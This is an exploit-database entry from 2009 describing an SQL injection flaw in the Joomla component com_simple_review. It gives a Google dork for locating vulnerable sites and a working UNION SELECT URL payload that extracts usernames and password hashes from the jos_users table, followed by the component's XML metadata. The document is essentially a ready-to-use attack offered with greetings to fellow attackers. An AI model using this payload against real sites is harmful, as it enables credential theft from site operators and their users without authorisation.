id: 4603
date: 01/05/2009
title: Joomla Component simple_review 1.x SQL Injection Vulnerability
author: EcHoLL
cves: 

==============================================================
Joomla Component simple_review 1.x SQL Injection Vulnerability
==============================================================


#Joomla com_simple_review Sql injection#
########################################
#[~] Author :  EcHoLL
#[~] Greetz : Black_label Hippi Godlike Nitrous
#[!] Module_Name:  com_simple_review
#[!] Script_Name:  Joomla
#[!] Google_Dork:  inurl:"com_simple_review"
########################################
 
www.scriptpage.com/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--

 <name>simple_review</name>
 <creationDate>29/05/2006</creationDate>
 <author>Rowan Youngson</author>
 <copyright>This component in released under the Mozilla Public License Version 1.1</copyright>

 <authorUrl>www.row1.info</authorUrl>
 <version>1.3.5</version>
 <description>Simple Review is a Review component for the Mambo CMS</description>




#  0day.today [2023-03-26]  #